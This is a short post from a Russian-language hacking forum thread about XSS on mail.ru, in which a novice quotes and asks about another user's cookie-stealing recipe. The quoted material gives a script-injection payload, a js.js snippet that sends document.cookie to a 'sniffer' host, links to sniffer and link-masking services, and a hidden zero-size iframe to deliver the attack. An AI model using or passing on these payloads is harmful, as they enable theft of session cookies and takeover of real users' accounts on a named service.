Тема: Xss на mail.ru
Показать сообщение отдельно

  #12  
Старый 06.06.2006, 16:43
Sirko
Новичок
Регистрация: 05.06.2006
Сообщений: 16
Провел на форуме:
37426

Репутация: 0
По умолчанию

Цитата:
Green_Bear]Для ознакомления:
https://forum.antichat.ru/thread18719.html

Чтобы куки украсть достаточно в уязвимом параметре написать:
Код:
<srcipt src=http://site.ru/js.js></script>
Непонятно в каком параметре????

Цитата:
В самом файле js.js
Код:
img = new Image();
img.src = "http://sniffer/sn.php?"+document.cookie;
Это надо создать файл и положить на сервак где выполняются скрипты??

Цитата:
Этот способ хорош тем, что работает даже там, где фильтруються ковычки.

Зарегить сниффер можно на http://antichat.org/sniffer or http://s.netsec.ru/
Замаскировать линк можно http://loc.netsec.ru/
Но лучше делать в ифрейме, например
Код:
<iframe src="http://site.ru/?para=<script src=http://site.ru/js.js></script>" frameborder="0" widht="0" height="0">
И куда этот инфрейм вставлвть???
Толке не говорите в Ж....
 
Ответить с цитированием